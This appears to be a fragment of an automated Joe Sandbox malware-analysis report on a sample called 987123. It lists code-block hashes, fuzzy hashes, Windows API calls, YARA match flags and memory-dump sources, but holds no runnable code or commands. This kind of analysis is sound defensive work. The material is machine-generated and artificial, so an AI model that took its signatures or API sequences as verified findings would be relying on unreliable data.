                                                                                                                                                                      • Opcode ID: f19d6598d7b3f8bbc47500c90c3d0bc6a0ede41a7b6f28d3ccddc132527cc834
                                                                                                                                                                      • Instruction ID: 49220a4dcaca44086484813bdb512237367292e15b320859d1a96440f4f24ef4
                                                                                                                                                                      • Opcode Fuzzy Hash: f19d6598d7b3f8bbc47500c90c3d0bc6a0ede41a7b6f28d3ccddc132527cc834
                                                                                                                                                                      • Instruction Fuzzy Hash: 7801A7B1208244FBDB016BD19D62EB93768AB05354F204537FA53790F2C67D8912E72B
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      • GlobalAlloc.KERNELBASE(00000000,00426E43), ref: 0042627E
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1707428338.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_40b000_987123.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AllocGlobal
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3761449716-0
                                                                                                                                                                      • Opcode ID: c63c633476a6b30e3cbc72ccf2760e4f1e962cc8df0d4cd49a32820b50132be8
                                                                                                                                                                      • Instruction ID: fc1c605fa557deb304322e7621df349ca9de26fb8ada197018152d43c4ea838b
                                                                                                                                                                      • Opcode Fuzzy Hash: c63c633476a6b30e3cbc72ccf2760e4f1e962cc8df0d4cd49a32820b50132be8
                                                                                                                                                                      • Instruction Fuzzy Hash: C9B09270906202BACB010B50BC04B043A60A308202F029038E10044169CE6100009E18
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1707428338.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_40b000_987123.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ___getlocaleinfo
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1937885557-0
                                                                                                                                                                      • Opcode ID: 2ae363ac02f4675a99ef2d0811e9ab02511fa2d8fd44f1555ce616a9256f3ba2
                                                                                                                                                                      • Instruction ID: 1d8a4a4208fe846f8572adedd4c486c13295830ddccbb16d2b6caae59cd68764
                                                                                                                                                                      • Opcode Fuzzy Hash: 2ae363ac02f4675a99ef2d0811e9ab02511fa2d8fd44f1555ce616a9256f3ba2
                                                                                                                                                                      • Instruction Fuzzy Hash: 81E1BFB2D0021DBEEF11DAE1CC41DFF77BDEB48748F04452AB255F2081EA75AA099B64
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 00426AA6: CreateJobObjectW.KERNEL32(00000000,0042A808), ref: 00426ABE
                                                                                                                                                                        • Part of subcall function 00426AA6: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 00426ADE
                                                                                                                                                                        • Part of subcall function 00426AA6: QueryPerformanceFrequency.KERNEL32(?), ref: 00426AE8
                                                                                                                                                                      • AbortSystemShutdownA.ADVAPI32(00000000), ref: 00426BB2
                                                                                                                                                                      • RtlLeaveCriticalSection.NTDLL(?), ref: 00426BBF
                                                                                                                                                                      • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00426BC6
                                                                                                                                                                      • EqualSid.ADVAPI32(00000000,00000000), ref: 00426BCE
                                                                                                                                                                      • ReadEventLogW.ADVAPI32(00000000,00000000,00000000,?,00000000,?,?), ref: 00426BED
                                                                                                                                                                      • CreateNamedPipeA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00426BFB
                                                                                                                                                                      • SetMessageWaitingIndicator.KERNEL32(00000000,00000000), ref: 00426C03
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1707428338.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_40b000_987123.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateFree$AbortCriticalEnvironmentEqualEventFrequencyHeapIndicatorLeaveMessageNamedObjectPerformancePipeQueryReadSectionShutdownStringsSystemWaiting
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1499581954-0
                                                                                                                                                                      • Opcode ID: 554733c9555090acae26fb75125752e492cde8f7e525f2d39a28a07975cfd069
                                                                                                                                                                      • Instruction ID: 7bb71a299ec9fd597a22554f06b932c273aa18c07b422c39bf0ba1d0a5452d15
                                                                                                                                                                      • Opcode Fuzzy Hash: 554733c9555090acae26fb75125752e492cde8f7e525f2d39a28a07975cfd069
                                                                                                                                                                      • Instruction Fuzzy Hash: DC110072602424BBCB21AB65ED48DDF7B7CEF4A355B41406AF20992111CE345A4ACFAD
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1708692549.0000000000720000.00000040.00001000.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_720000_987123.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: .$GetProcAddress.$l
                                                                                                                                                                      • API String ID: 0-2784972518
                                                                                                                                                                      • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                                                                                                      • Instruction ID: 9248be7a0968b3dbe9a1f9f8590bfd1b4edbc9b954090c5527be1aa7a1347cb6
                                                                                                                                                                      • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                                                                                                      • Instruction Fuzzy Hash: 90317AB6901619CFDB10CF99D884AAEBBF9FF08324F24404AD441A7312D775EA85CBA4
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1707428338.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_40b000_987123.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: q@
                                                                                                                                                                      • API String ID: 0-1698252612
                                                                                                                                                                      • Opcode ID: 090c78479163ea0610928411f2340dce47eda80b78cc92b80adbacb5faee63ba
                                                                                                                                                                      • Instruction ID: a0652d3ce88ab9c9a6a66e03d2dd10ec1c4a6fee5427327c51fad44fec9317c2
                                                                                                                                                                      • Opcode Fuzzy Hash: 090c78479163ea0610928411f2340dce47eda80b78cc92b80adbacb5faee63ba
                                                                                                                                                                      • Instruction Fuzzy Hash: 2202B373D4A7B34B8B714EF940E01A77AA05E8179031F87EADCC42F386D11ADD4996E4
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      • EnumSystemLocalesA.KERNEL32(Function_00007B63,00000001), ref: 00412F1D
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1707428338.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_40b000_987123.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: EnumLocalesSystem
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2099609381-0
                                                                                                                                                                      • Opcode ID: be7e014d2535137ffcc6b80599efa664ca3190f498a881cc61746656fd1f4e1c
                                                                                                                                                                      • Instruction ID: eee729147250e6a3d627816743500396ac2ae96a015d1fad2bd5f10a87301037
                                                                                                                                                                      • Opcode Fuzzy Hash: be7e014d2535137ffcc6b80599efa664ca3190f498a881cc61746656fd1f4e1c
                                                                                                                                                                      • Instruction Fuzzy Hash: 27D0A7B0A143090AE7208F70C64937177D0E710F04F60865DD842C04C0C6F891858108
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      • GetLocaleInfoW.KERNEL32(?,?,?,?), ref: 0041069F
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1707428338.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_40b000_987123.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: InfoLocale
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2299586839-0
                                                                                                                                                                      • Opcode ID: ef3333f3be8afe0cf7469cadc51202ea561cfe2d8d7a148997f15d3afb4d1b5b
                                                                                                                                                                      • Instruction ID: 7dd0f3c9fdbd3015062d09b9213eec65eb77beb7cfa0a3e6df41f72243fb8867
                                                                                                                                                                      • Opcode Fuzzy Hash: ef3333f3be8afe0cf7469cadc51202ea561cfe2d8d7a148997f15d3afb4d1b5b
                                                                                                                                                                      • Instruction Fuzzy Hash: ACC0013200024DBB8F125F82EC088AA3F2AEB88261B448024FA28050208B329972EB95
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1707428338.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_40b000_987123.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
                                                                                                                                                                      • Instruction ID: 9a0f620e3ebe7d8702649516ea3dc75a48463be511439a55ac234a5774eb2e3a
                                                                                                                                                                      • Opcode Fuzzy Hash: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
                                                                                                                                                                      • Instruction Fuzzy Hash: 66D18EB3D1F9B38A8735852D41682BBEA626FC175032FC3E2DCD42F389E12A5C9195D4
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1707428338.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_40b000_987123.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
                                                                                                                                                                      • Instruction ID: e9c2296dde24ad7bd4c46091af30d42f78d942f49e75c20e064702e9834d5e26
                                                                                                                                                                      • Opcode Fuzzy Hash: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
                                                                                                                                                                      • Instruction Fuzzy Hash: A2D19377D0B9B3868735852D41582BBEA626FD175132FC3E2CCD42F389E12A5C8195D4
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1707428338.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_40b000_987123.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
                                                                                                                                                                      • Instruction ID: 2faefa9e45faba76db4febe78d25d89b1b31c2fb2f87a1cf0fc9c344c162e149
                                                                                                                                                                      • Opcode Fuzzy Hash: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
                                                                                                                                                                      • Instruction Fuzzy Hash: 9BC190B3D0B9B34A8736852D41582ABEE626FD175032FC3E2CCD43F389E62A5D8195D4
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1707428338.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_40b000_987123.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
                                                                                                                                                                      • Instruction ID: 5948d0dd12f47a0141abae5d44e39d6a870b737dda70436091219987f2dcb729
                                                                                                                                                                      • Opcode Fuzzy Hash: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
                                                                                                                                                                      • Instruction Fuzzy Hash: 2FC191B3D0B9B30A8735852D41582BBEE626FD175132FC3E2DCD42F389E22A5D8196D4
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1709555486.000000000080D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0080D000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_80d000_987123.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                                                                                      • Instruction ID: 2b98fbdda82869138172cf521047e42eb8236dbaf840c6b1ad13fa10aa9322d0
                                                                                                                                                                      • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                                                                                      • Instruction Fuzzy Hash: B9117C72340111AFD7A4DF59DC81EA673EAFB8D364B298065EE08CB752D675EC02CB60
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1708692549.0000000000720000.00000040.00001000.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_720000_987123.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                                                                                                                      • Instruction ID: 5b73c2960222beac1885d921750ed65aca91a7b389827e70e2e72963492b3e6c
                                                                                                                                                                      • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                                                                                                                      • Instruction Fuzzy Hash: 6701F776B016108FDF21DF60E804BAA33F5FB85305F0544A4D50697243E378A8418BE0
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1707386702.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_987123.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: c0f638128aba8f2e57abeaf16cd5152cf31c34a5a8aefa37a689e9950b3c5785
                                                                                                                                                                      • Instruction ID: d35cd02017a8908298582cacd0956aff43537afd2df8e264233619bb44fb754d
                                                                                                                                                                      • Opcode Fuzzy Hash: c0f638128aba8f2e57abeaf16cd5152cf31c34a5a8aefa37a689e9950b3c5785
                                                                                                                                                                      • Instruction Fuzzy Hash: 82C08C72D960008AE65BC6908A87644BB33F003830B341F2DC5018F126D272C2178220
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1707386702.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_987123.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 43de6de374997940977aed32f8962cbc5b01e7d76103009d4fd772cc687ca080
                                                                                                                                                                      • Instruction ID: b8708e0fd601c17419c4bee628408aeaf70cc106fe2e9d70b960fe5b7e9fb35e
                                                                                                                                                                      • Opcode Fuzzy Hash: 43de6de374997940977aed32f8962cbc5b01e7d76103009d4fd772cc687ca080
                                                                                                                                                                      • Instruction Fuzzy Hash: 0DC02B7308020940C754CE701A0010CF2D09555208F31FD234005FF182D260F1C755C2
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      • SetConsoleCP.KERNEL32(00000000), ref: 00426C5A
                                                                                                                                                                      • GetLastError.KERNEL32 ref: 00426C60
                                                                                                                                                                      • GetCompressedFileSizeA.KERNEL32(00000000,?), ref: 00426C7E
                                                                                                                                                                      • TlsSetValue.KERNEL32(00000000,00000000), ref: 00426C88
                                                                                                                                                                      • CopyFileExW.KERNEL32(0042A884,0042A840,00000000,00000000,00000000,00000000), ref: 00426CD8
                                                                                                                                                                      • AddAtomA.KERNEL32(00000000), ref: 00426CE0
                                                                                                                                                                      • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00426CE8
                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00426CF0
                                                                                                                                                                      • EnumDateFormatsExA.KERNEL32(00000000,00000000,00000000), ref: 00426CFC
                                                                                                                                                                      • RtlTryEnterCriticalSection.NTDLL(?), ref: 00426D12
                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 00426D55
                                                                                                                                                                      • LocalFree.KERNEL32(00000000), ref: 00426D5D
                                                                                                                                                                      • SetTimeZoneInformation.KERNEL32(00000000), ref: 00426D6F
                                                                                                                                                                      • DnsHostnameToComputerNameW.KERNEL32(0042A8B8,?,?), ref: 00426D88
                                                                                                                                                                      • IsProcessInJob.KERNEL32(00000000,00000000,00000000), ref: 00426D94
                                                                                                                                                                      • SetCurrentDirectoryA.KERNEL32(00000000), ref: 00426D9C
                                                                                                                                                                      • CreateWaitableTimerW.KERNEL32(00000000,00000000,00000000), ref: 00426DA8
                                                                                                                                                                      • CompareStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00426DBA
                                                                                                                                                                      • GetLongPathNameA.KERNEL32(0042A96C,?,00000000), ref: 00426DCE
                                                                                                                                                                      • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 00426DDA
                                                                                                                                                                      • VirtualLock.KERNEL32(00000000,00000000), ref: 00426EA8
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1707428338.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_40b000_987123.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Free$FileName$AtomCompareCompressedComputerConsoleCopyCreateCriticalCurrentDateDirectoryEnterEnumEnvironmentErrorFormatsHandleHeapHostnameInformationLastLibraryLocalLockLongModulePathProcessSectionSizeStringStringsTimeTimerValueVirtualWaitableZone
                                                                                                                                                                      • String ID: tl_
                                                                                                                                                                      • API String ID: 3672566368-2653253968
                                                                                                                                                                      • Opcode ID: 023b01b2221e3b475b69840e1338eb58c9f171fb43f840df13a42cd57c5a8a76
                                                                                                                                                                      • Instruction ID: 593f59daaad18869312403a55f7fc19da0f2a56b7eb65824d8e59fabf7132564
                                                                                                                                                                      • Opcode Fuzzy Hash: 023b01b2221e3b475b69840e1338eb58c9f171fb43f840df13a42cd57c5a8a76
                                                                                                                                                                      • Instruction Fuzzy Hash: C9716F31B45314EFEB20AB55FC46B9C77B4AB04716F92407AF209AA1D0CBB81985CF1E
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      • GetStringTypeW.KERNEL32(00000001,0042A804,00000001,?,004360B4,?,00000000,?,?,?,00415FA2,00000001,?,0040DB7F,?,?), ref: 00415DE7
                                                                                                                                                                      • GetLastError.KERNEL32(?,00415FA2,00000001,?,0040DB7F,?,?,?,?,0040DB7F,?,00000001,0040DB7F,00000000,?,00410202), ref: 00415DF9
                                                                                                                                                                      • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,00410202,0040DB7F,00000004), ref: 00415ED6
                                                                                                                                                                      • __freea.LIBCMT ref: 00415EE0
                                                                                                                                                                      • ___ansicp.LIBCMT ref: 00415F0A
                                                                                                                                                                      • ___convertcp.LIBCMT ref: 00415F2B
                                                                                                                                                                        • Part of subcall function 00417DBB: WideCharToMultiByte.KERNEL32(?,00000000,?,00000000,?,?,00000000,00000000), ref: 00417EE7
                                                                                                                                                                      • GetStringTypeA.KERNEL32(?,?,?,?,?,004360B4,?,00000000,?,?,?,00415FA2,00000001,?,0040DB7F,?), ref: 00415F4B
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1707428338.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_40b000_987123.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: StringType$ByteCharErrorLastMultiWide___ansicp___convertcp__freea
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2117302395-0
                                                                                                                                                                      • Opcode ID: 68925163f8d2cb2ffe34cbaa868f7041e780839bbbf2ba4cae6835cd480bb5fe
                                                                                                                                                                      • Instruction ID: ca033a73e6e72983c9a9d679e9bdb60d592808fde03c7af922bf76edf28fa3e8
                                                                                                                                                                      • Opcode Fuzzy Hash: 68925163f8d2cb2ffe34cbaa868f7041e780839bbbf2ba4cae6835cd480bb5fe
                                                                                                                                                                      • Instruction Fuzzy Hash: CD51947190060AEFDF209F64DC819EF3BA9EB44354B14442BF914D7251D739CEA28F98
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      • __copytlocinfo_nolock.LIBCMT ref: 0040F0DA
                                                                                                                                                                      • __setlocale_nolock.LIBCMT ref: 0040F0EF
                                                                                                                                                                      • ___removelocaleref.LIBCMT ref: 0040F13C
                                                                                                                                                                      • _sync_legacy_variables_lk.LIBCMT ref: 0040F175
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1707428338.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_40b000_987123.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ___removelocaleref__copytlocinfo_nolock__setlocale_nolock_sync_legacy_variables_lk
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 219049737-0
                                                                                                                                                                      • Opcode ID: dacc1972c0434a0bf5af0a5a41b4905e0ab1bd420b2feee1509a2fb71b3498ae
                                                                                                                                                                      • Instruction ID: e82b908fcd04b0c8271428fc9e876450d87c6f8e9b7736501bad91097e15c42b
                                                                                                                                                                      • Opcode Fuzzy Hash: dacc1972c0434a0bf5af0a5a41b4905e0ab1bd420b2feee1509a2fb71b3498ae
                                                                                                                                                                      • Instruction Fuzzy Hash: BB319E71A04304EADB20BFA6D88275D77A0AF44318F64847FF8057A2D2DBBC8949965D
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1707428338.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_40b000_987123.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ___freetlocinfo___removelocaleref$__copytlocinfo_nolock__setlocale_nolock
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2861315002-0
                                                                                                                                                                      • Opcode ID: 676938aa1b07ffee4317a3e9da7522dc6a978b0ffa9d9d955223042bd2505dcb
                                                                                                                                                                      • Instruction ID: 1e9a1880e5c348e0703ca33c00f51b07e8167d824e2e2b5aeb5d90bb728b835f
                                                                                                                                                                      • Opcode Fuzzy Hash: 676938aa1b07ffee4317a3e9da7522dc6a978b0ffa9d9d955223042bd2505dcb
                                                                                                                                                                      • Instruction Fuzzy Hash: 0C21D635508602AED7357F27D80291A7BE4DF9176CB20883FF884762E2EE7DA810865D
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00426B1C
                                                                                                                                                                      • LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,?,00000000), ref: 00426B43
                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00426B4A
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1707428338.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_40b000_987123.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: EnvironmentFreeHandleModuleStringStrings
                                                                                                                                                                      • String ID: -$-
                                                                                                                                                                      • API String ID: 1582636504-2078519666
                                                                                                                                                                      • Opcode ID: 8f32ab569507f01aa0049d6880b6fb86c3b21e050f5aecc8115885299aab47e4
                                                                                                                                                                      • Instruction ID: a5cf57eb544cada761a9054dbdeb56e39503428340a04bc9be4330430455ef5c
                                                                                                                                                                      • Opcode Fuzzy Hash: 8f32ab569507f01aa0049d6880b6fb86c3b21e050f5aecc8115885299aab47e4
                                                                                                                                                                      • Instruction Fuzzy Hash: 9401F930600124ABC7709F29ECC4D5F7FF8EB89314B92406EE451D7160CE34598ACB99
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Execution Graph

                                                                                                                                                                      Execution Coverage:3.7%
                                                                                                                                                                      Dynamic/Decrypted Code Coverage:27.3%
                                                                                                                                                                      Signature Coverage:0%
                                                                                                                                                                      Total number of Nodes:99
                                                                                                                                                                      Total number of Limit Nodes:5
